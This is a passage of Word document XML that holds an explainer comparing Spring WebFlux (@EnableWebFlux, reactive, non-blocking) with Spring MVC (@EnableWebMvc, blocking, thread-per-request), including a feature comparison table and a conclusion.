      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Flux</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Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (from Project Reactor).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA960E3" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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deal for building scalable and non-blocking applications, such as APIs handling a high volume of requests concurrently, with minimal server resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF6A054" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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t is suitable for environments that need asynchronous event-driven processing, like real-time applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0671BBBE"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nableWebMvc</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543C1A00" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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Supports the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>imperative programming model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where each HTTP request is processed synchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BE51C3" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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ypically uses a thread-per-request model, where each incoming request is assigned a dedicated thread. This can become a bottleneck when handling a large number of concurrent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40535E90" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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uitable for traditional server-side rendered applications (MVC architecture).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595F810B"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3. Request Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE66ED1"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nableWebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06363061" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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Handles requests in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, asynchronous manner. This is achieved using reactive streams and is ideal for applications where the number of concurrent users is high, but the server's resources are limited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EAB4A8"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nableWebMvc</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32216C72" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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Handles requests in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> manner. Each request occupies a dedicated thread, and the server can be overwhelmed when many requests are processed simultaneously (although this can be mitigated with server optimization techniques).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474A1BF8"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4. Threading Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011FC8AC"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nableWebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B621E37" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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Follows a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive, event-driven, non-blocking I/O model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The server processes requests without blocking the threads, allowing it to handle more requests concurrently without adding many threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2DF282"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nableWebMvc</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BD31F5" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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Follows a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking, thread-per-request model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where each HTTP request typically consumes a separate thread for its duration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C32377C"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5. Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D873B5A"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nableWebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FCEB73" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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Ideal for microservices, real-time applications, and APIs with a large number of concurrent clients (e.g., chat applications, financial services).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE16914" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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Also better suited for environments with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cloud-native</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distributed architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and scalability in mind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E88F6FC"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nableWebMvc</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67780FC4" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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Suitable for traditional </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>monolithic applications</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server-side rendered</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> web applications, such as CRUD-based web applications, and APIs with a smaller number of clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0401B38A"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6. Integration with Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505166BC"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nableWebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDF1D93" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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f you are using Spring Boot with WebFlux, Spring Boot automatically configures WebFlux for you, and you don't need to explicitly use @EnableWebFlux. It’s configured when you add the spring-boot-starter-webflux dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537E8417"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nableWebMvc</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379E5194" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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f you are using Spring Boot with Spring MVC, @EnableWebMvc is also typically not needed. Spring Boot automatically configures Spring MVC if you add the spring-boot-starter-web dependency. However, if you need custom configuration, you can use @EnableWebMvc to enable and extend Spring MVC configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAC71D5"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7. Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2597D4C4"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nableWebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCA3B9E" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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More performant for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>highly concurrent, real-time</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I/O-bound</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications, as it uses non-blocking I/O, allowing it to handle a large number of requests without consuming many threads or resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055E0321"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nableWebMvc</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AABD98" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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More suitable for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>traditional</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications, but may have performance limitations in handling large numbers of concurrent requests due to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> nature and thread management overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3810F6"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5"/>
        <w:gridCol w:w="4141"/>
        <w:gridCol w:w="4138"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="726B2517" w14:textId="77777777" w:rsidTr="00281739">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60EF95AB"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="624DAC0B"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nableWebFlux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58CE038D"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nableWebMvc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="7B982DA2" w14:textId="77777777" w:rsidTr="00281739">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="137AE0A3"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Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C089BAA"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 WebFlux (Reactive)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2148A96B"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 MVC (Traditional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="082923CF" w14:textId="77777777" w:rsidTr="00281739">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="181B8FCC"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quest Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="746846F8"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Non-blocking, Asynchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F778B55"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Blocking, Synchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="02BA3B4B" w14:textId="77777777" w:rsidTr="00281739">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D4F6D34"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Programming Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B1D35C9"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active (Flux/Mono)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AA54E51"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erative (Traditional Servlet model)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="76D7E76E" w14:textId="77777777" w:rsidTr="00281739">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D8152C2"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Threading Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2550C442"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vent-driven, Non-blocking I/O</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2685D20C"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read-per-request (Blocking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="56E7E90D" w14:textId="77777777" w:rsidTr="00281739">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53D65554"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Ideal Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="609466C8"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al-time, Scalable, Concurrent APIs, Microservices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3837FCBE"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raditional Web Apps, Server-side rendered apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="65DE964E" w14:textId="77777777" w:rsidTr="00281739">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19E4845F"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Backpressure Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EB6F285"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Yes (Reactive Streams API)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B82D97D"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No (Uses Thread-per-Request)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="6C63CA1E" w14:textId="77777777" w:rsidTr="00281739">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27391EF4"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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="556550B4"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Handles large numbers of concurrent requests well</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AD5EFF8"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ay face issues with high concurrency due to blocking I/O</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="07877E9D" w14:textId="77777777" w:rsidTr="00281739">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B4DD69C"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pring Boot Integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="042F064D"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utomatically configured with spring-boot-starter-webflux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B117378"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utomatically configured with spring-boot-starter-web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74111377"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onclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E24B28B"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nableWebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is for reactive, non-blocking, and scalable applications, while </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@EnableWebMvc</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is for traditional, blocking, and synchronous web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E25124"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choice between WebFlux and WebMvc depends on your application's requirements—if you need real-time, high-concurrency applications, WebFlux is the better choice. For traditional web apps, Spring MVC is still a strong option.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441A6DA4"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F84D575">
          <v:rect id="_x0000_i2291" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ED1601" w14:textId="05E6D39F"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05" w:name="_Toc196307985"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
